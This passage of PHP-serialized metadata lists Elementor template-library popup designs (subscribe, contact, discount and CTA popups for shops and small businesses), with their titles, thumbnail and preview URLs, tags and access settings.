Store\";s:9:\"thumbnail\";s:75:\"https://library.elementor.com/wp-content/uploads/2022/03/shoes-store-21.jpg\";s:12:\"tmpl_created\";i:1647418620;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:134:\"https://library.elementor.com/popups/classic-subscribe-shoe-store/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:37:\"[\"Ecommerce\",\"Marketing\",\"Subscribe\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:3;a:21:{s:4:\"tmpl\";i:1286;s:2:\"id\";i:22446;s:5:\"title\";s:37:\"Full Screen | Subscribe | Denim Store\";s:9:\"thumbnail\";s:75:\"https://library.elementor.com/wp-content/uploads/2022/03/denim-store-22.jpg\";s:12:\"tmpl_created\";i:1647419614;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:139:\"https://library.elementor.com/popups/full-screen-subscribe-denim-store/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:11:\"full screen\";s:4:\"tags\";s:35:\"[\"Ecommerce\",\"Fashion\",\"Marketing\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:4;a:21:{s:4:\"tmpl\";i:1287;s:2:\"id\";i:22452;s:5:\"title\";s:37:\"Fly-In | Subscribe | Pizza Restaurant\";s:9:\"thumbnail\";s:80:\"https://library.elementor.com/wp-content/uploads/2022/03/pizza-restaurant-23.jpg\";s:12:\"tmpl_created\";i:1647420733;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:139:\"https://library.elementor.com/popups/fly-in-subscribe-pizza-restaurant/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"fly-in\";s:4:\"tags\";s:19:\"[\"Business\",\"Food\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:5;a:21:{s:4:\"tmpl\";i:1288;s:2:\"id\";i:22458;s:5:\"title\";s:38:\"Full Screen | Subscribe | Fashion Shop\";s:9:\"thumbnail\";s:76:\"https://library.elementor.com/wp-content/uploads/2022/03/fashion-shop-24.jpg\";s:12:\"tmpl_created\";i:1647426379;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:140:\"https://library.elementor.com/popups/full-screen-subscribe-fashion-shop/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:11:\"full screen\";s:4:\"tags\";s:31:\"[\"Ecommerce\",\"Fashion\",\"Sales\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:6;a:21:{s:4:\"tmpl\";i:1289;s:2:\"id\";i:22464;s:5:\"title\";s:32:\"Fly-In | Contact | Makeup Studio\";s:9:\"thumbnail\";s:77:\"https://library.elementor.com/wp-content/uploads/2022/03/makeup-studio-25.jpg\";s:12:\"tmpl_created\";i:1647427026;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:134:\"https://library.elementor.com/popups/fly-in-contact-makeup-studio/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"fly-in\";s:4:\"tags\";s:22:\"[\"Business\",\"Contact\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:7;a:21:{s:4:\"tmpl\";i:1290;s:2:\"id\";i:22470;s:5:\"title\";s:32:\"Fly-In | Contact | Design Studio\";s:9:\"thumbnail\";s:77:\"https://library.elementor.com/wp-content/uploads/2022/03/design-studio-26.jpg\";s:12:\"tmpl_created\";i:1647428250;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:134:\"https://library.elementor.com/popups/fly-in-contact-design-studio/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"fly-in\";s:4:\"tags\";s:39:\"[\"Business\",\"Contact\",\"Digital Agency\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:8;a:21:{s:4:\"tmpl\";i:1291;s:2:\"id\";i:22480;s:5:\"title\";s:27:\"Classic | CTA | MasterClass\";s:9:\"thumbnail\";s:76:\"https://library.elementor.com/wp-content/uploads/2022/03/master-class-27.jpg\";s:12:\"tmpl_created\";i:1647428474;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:129:\"https://library.elementor.com/popups/classic-cta-masterclass/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:29:\"[\"cta\",\"Magazine\",\"Services\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:9;a:21:{s:4:\"tmpl\";i:1292;s:2:\"id\";i:22489;s:5:\"title\";s:29:\"Classic | CTA | Music Concert\";s:9:\"thumbnail\";s:77:\"https://library.elementor.com/wp-content/uploads/2022/03/music-concert-29.jpg\";s:12:\"tmpl_created\";i:1647429738;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:131:\"https://library.elementor.com/popups/classic-cta-music-concert/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:34:\"[\"cta\",\"Landing Pages\",\"Magazine\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:10;a:21:{s:4:\"tmpl\";i:1293;s:2:\"id\";i:22495;s:5:\"title\";s:27:\"Classic | CTA | Music Album\";s:9:\"thumbnail\";s:75:\"https://library.elementor.com/wp-content/uploads/2022/03/music-album-30.jpg\";s:12:\"tmpl_created\";i:1647430056;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:129:\"https://library.elementor.com/popups/classic-cta-music-album/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:34:\"[\"Ba\",\"Landing Pages\",\"Marketing\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:11;a:21:{s:4:\"tmpl\";i:1294;s:2:\"id\";i:22501;s:5:\"title\";s:37:\"Fly-In | CTA | Photography Exhibition\";s:9:\"thumbnail\";s:86:\"https://library.elementor.com/wp-content/uploads/2022/03/photography-exhibition-31.jpg\";s:12:\"tmpl_created\";i:1647430512;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:139:\"https://library.elementor.com/popups/fly-in-cta-photography-exhibition/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"fly-in\";s:4:\"tags\";s:33:\"[\"cta\",\"Photography\",\"Portfolio\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:12;a:21:{s:4:\"tmpl\";i:1295;s:2:\"id\";i:22507;s:5:\"title\";s:34:\"Classic | CTA | Clothing Shop Sale\";s:9:\"thumbnail\";s:82:\"https://library.elementor.com/wp-content/uploads/2022/03/clothing-shop-sale-32.jpg\";s:12:\"tmpl_created\";i:1647430774;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:136:\"https://library.elementor.com/popups/classic-cta-clothing-shop-sale/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:35:\"[\"Ecommerce\",\"Fashion\",\"Marketing\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:13;a:21:{s:4:\"tmpl\";i:1296;s:2:\"id\";i:22486;s:5:\"title\";s:30:\"Classic | CTA | Shop Promotion\";s:9:\"thumbnail\";s:78:\"https://library.elementor.com/wp-content/uploads/2022/03/shop-promotion-28.jpg\";s:12:\"tmpl_created\";i:1647430951;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:132:\"https://library.elementor.com/popups/classic-cta-shop-promotion/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:32:\"[\"cta\",\"Magazine\",\"Photography\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:14;a:21:{s:4:\"tmpl\";i:1297;s:2:\"id\";i:22516;s:5:\"title\";s:32:\"Fly-In | CTA | Glasses Shop Sale\";s:9:\"thumbnail\";s:81:\"https://library.elementor.com/wp-content/uploads/2022/03/glasses-shop-sale-33.jpg\";s:12:\"tmpl_created\";i:1647431136;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:134:\"https://library.elementor.com/popups/fly-in-cta-glasses-shop-sale/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"fly-in\";s:4:\"tags\";s:30:\"[\"Business\",\"cta\",\"Marketing\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:15;a:21:{s:4:\"tmpl\";i:1298;s:2:\"id\";i:22522;s:5:\"title\";s:30:\"Fly-In | Discount | Skate Shop\";s:9:\"thumbnail\";s:83:\"https://library.elementor.com/wp-content/uploads/2022/03/50-skate-shop-Discount.jpg\";s:12:\"tmpl_created\";i:1647434058;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:132:\"https://library.elementor.com/popups/fly-in-discount-skate-shop/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"fly-in\";s:4:\"tags\";s:32:\"[\"Discount\",\"Ecommerce\",\"Sales\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:16;a:21:{s:4:\"tmpl\";i:1299;s:2:\"id\";i:22532;s:5:\"title\";s:43:\"Classic | Subscription | Basketball Academy\";s:9:\"thumbnail\";s:95:\"https://library.elementor.com/wp-content/uploads/2022/03/21-basketball-academy-Subscription.jpg\";s:12:\"tmpl_created\";i:1647434608;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:145:\"https://library.elementor.com/popups/classic-subscription-basketball-academy/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:33:\"[\"Education\",\"Marketing\",\"Sport\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:17;a:21:{s:4:\"tmpl\";i:1300;s:2:\"id\";i:22543;s:5:\"title\";s:38:\"Classic | Discount | Veterinary Clinic\";s:9:\"thumbnail\";s:84:\"https://library.elementor.com/wp-content/uploads/2022/03/veterinery-clinic-small.jpg\";s:12:\"tmpl_created\";i:1647435581;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:140:\"https://library.elementor.com/popups/classic-discount-veterinary-clinic/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:19:\"[\"Discount\",\"Pets\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:18;a:21:{s:4:\"tmpl\";i:1301;s:2:\"id\";i:22553;s:5:\"title\";s:39:\"Classic | Contact | Business Consulting\";s:9:\"thumbnail\";s:94:\"https://library.elementor.com/wp-content/uploads/2022/03/27-business-consulting-Contact-Us.jpg\";s:12:\"tmpl_created\";i:1647439935;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:141:\"https://library.elementor.com/popups/classic-contact-business-consulting/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:22:\"[\"Business\",\"Contact\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:19;a:21:{s:4:\"tmpl\";i:1302;s:2:\"id\";i:22562;s:5:\"title\";s:28:\"Classic | Contact | Handyman\";s:9:\"thumbnail\";s:75:\"https://library.elementor.com/wp-content/uploads/2022/03/handyman-small.jpg\";s:12:\"tmpl_created\";i:1647440333;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:130:\"https://library.elementor.com/popups/classic-contact-handyman/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:33:\"[\"Business\",\"Contact\",\"Services\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:20;a:21:{s:4:\"tmpl\";i:1303;s:2:\"id\";i:22573;s:5:\"title\";s:40:\"Classic | Discount | Online Fashion Shop\";s:9:\"thumbnail\";s:92:\"https://library.elementor.com/wp-content/uploads/2022/03/31-online-fashion-shop-Discount.jpg\";s:12:\"tmpl_created\";i:1647462549;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:142:\"https://library.elementor.com/popups/classic-discount-online-fashion-shop/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:32:\"[\"Discount\",\"Ecommerce\",\"Sales\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:21;a:21:{s:4:\"tmpl\";i:1304;s:2:\"id\";i:22583;s:5:\"title\";s:36:\"Fly-In | Discount | Personal Trainer\";s:9:\"thumbnail\";s:83:\"https://library.elementor.com/wp-content/uploads/2022/03/personal-trainer-small.jpg\";s:12:\"tmpl_created\";i:1647503781;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:138:\"https://library.elementor.com/popups/fly-in-discount-personal-trainer/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"fly-in\";s:4:\"tags\";s:31:\"[\"Discount\",\"Sport\",\"Training\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:22;a:21:{s:4:\"tmpl\";i:1305;s:2:\"id\";i:22592;s:5:\"title\";s:41:\"Classic | Contact | Illustrator Portfolio\";s:9:\"thumbnail\";s:88:\"https://library.elementor.com/wp-content/uploads/2022/03/illustrator-protfolio-small.jpg\";s:12:\"tmpl_created\";i:1647504218;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:143:\"https://library.elementor.com/popups/classic-contact-illustrator-portfolio/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:49:\"[\"Contact\",\"Creative Portfolio\",\"Digital Agency\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:23;a:21:{s:4:\"tmpl\";i:1306;s:2:\"id\";i:22602;s:5:\"title\";s:46:\"Bottom Bar | Discount | Handmade Ceramics Shop\";s:9:\"thumbnail\";s:91:\"https://library.elementor.com/wp-content/uploads/2022/03/handmade-ceramic-shop-36-small.jpg\";s:12:\"tmpl_created\";i:1647507007;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:148:\"https://library.elementor.com/popups/bottom-bar-discount-handmade-ceramics-shop/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:10:\"bottom bar\";s:4:\"tags\";s:48:\"[\"Business\",\"cta\",\"Ecommerce\",\"Interior Design\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:24;a:21:{s:4:\"tmpl\";i:1307;s:2:\"id\";i:22612;s:5:\"title\";s:51:\"Classic | Contact | Classic Car Restoration Company\";s:9:\"thumbnail\";s:90:\"https://library.elementor.com/wp-content/uploads/2022/03/restoration-car-shop-37-small.jpg\";s:12:\"tmpl_created\";i:1647507310;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:153:\"https://library.elementor.com/popups/classic-contact-classic-car-restoration-company/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:32:\"[\"Booking\",\"Contact\",\"Services\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:25;a:21:{s:4:\"tmpl\";i:1308;s:2:\"id\";i:22621;s:5:\"title\";s:30:\"Classic | Booking | Life Coach\";s:9:\"thumbnail\";s:82:\"https://library.elementor.com/wp-content/uploads/2022/03/38-life-coach-Booking.jpg\";s:12:\"tmpl_created\";i:1647508596;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:132:\"https://library.elementor.com/popups/classic-booking-life-coach/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:33:\"[\"Booking\",\"Business\",\"Services\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:26;a:21:{s:4:\"tmpl\";i:1309;s:2:\"id\";i:22632;s:5:\"title\";s:42:\"Classic |  Subscription | Merchandise Shop\";s:9:\"thumbnail\";s:86:\"https://library.elementor.com/wp-content/uploads/2022/03/Merchandise-Shop-39-small.jpg\";s:12:\"tmpl_created\";i:1647509196;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:143:\"https://library.elementor.com/popups/classic-subscription-merchandise-shop/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:32:\"[\"Ecommerce\",\"Marketing\",\"Shop\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:27;a:21:{s:4:\"tmpl\";i:1310;s:2:\"id\";i:22643;s:5:\"title\";s:48:\"Fly-In | Contact | Non-Governmental Organization\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2022/03/NGO-41-small.jpg\";s:12:\"tmpl_created\";i:1647509528;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:150:\"https://library.elementor.com/popups/fly-in-contact-non-governmental-organization/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"fly-in\";s:4:\"tags\";s:11:\"[\"Contact\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:28;a:21:{s:4:\"tmpl\";i:1311;s:2:\"id\";i:22654;s:5:\"title\";s:35:\"Hello Bar | Contact | Family Doctor\";s:9:\"thumbnail\";s:83:\"https://library.elementor.com/wp-content/uploads/2022/03/family-doctor-44-small.jpg\";s:12:\"tmpl_created\";i:1647509732;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:137:\"https://library.elementor.com/popups/hello-bar-contact-family-doctor/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:9:\"hello 